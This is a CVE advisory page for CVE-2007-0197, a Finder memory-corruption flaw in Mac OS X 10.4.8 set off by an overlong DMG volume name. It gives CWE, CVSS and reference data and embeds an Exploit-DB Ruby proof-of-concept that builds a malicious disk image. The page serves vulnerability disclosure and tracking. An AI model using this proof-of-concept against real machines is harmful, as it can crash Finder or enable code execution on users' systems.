CVE-2007-0197 : Detail

CVE-2007-0197

Overflow
A03-Injection
53.85%V4
Network
2007-01-11
10h00 +00:00
2018-10-16
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Finder 10.4.6 on Apple Mac OS X 10.4.8 allows user-assisted remote attackers to cause a denial of service and possibly execute arbitrary code via a long volume name in a DMG disk image, which results in memory corruption.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 3110

Publication date : 2007-01-08 23h00 +00:00
Author : MoAB
EDB Verified : Yes

#!/usr/bin/ruby # (c) 2006 LMH <lmh [at] infopull.com>. # require 'fileutils' require 'zlib' hdiutil = "/usr/bin/hdiutil" dmgname = (ARGV[0] || "MOAB-09-01-2007.dmg") dmgsize = (ARGV[1] || "200k") filesys = (ARGV[2] || "UFS") volname = "" 255.times do volname << (i = Kernel.rand(62); i += ((i < 10) ? 48 : ((i < 36) ? 55 : 61 ))).chr end FileUtils.rm_f(dmgname) system "#{hdiutil} create #{dmgname} -size #{dmgsize} -fs #{filesys} -volname #{volname}" puts "++ reading #{dmgname}..." dmg_stream = File.read(dmgname) dmg_vnsize = dmg_stream[0x9c10,0x9c14].unpack("C2") puts "++ volname length at dmg: #{dmg_vnsize}" puts "++ dmg size: #{dmg_stream.size} bytes." # milw0rm.com [2007-01-09]

Products Mentioned

Configuraton 0

Apple>>Mac_os_x >> Version 10.4.6

Apple>>Mac_os_x >> Version 10.4.8

References

http://www.vupen.com/english/advisories/2007/0140
Tags : vdb-entry, x_refsource_VUPEN
http://www.us-cert.gov/cas/techalerts/TA07-047A.html
Tags : third-party-advisory, x_refsource_CERT
http://secunia.com/advisories/24198
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.osvdb.org/32714
Tags : vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/bid/21980
Tags : vdb-entry, x_refsource_BID
http://www.kb.cert.org/vuls/id/240880
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securitytracker.com/id?1017662
Tags : vdb-entry, x_refsource_SECTRACK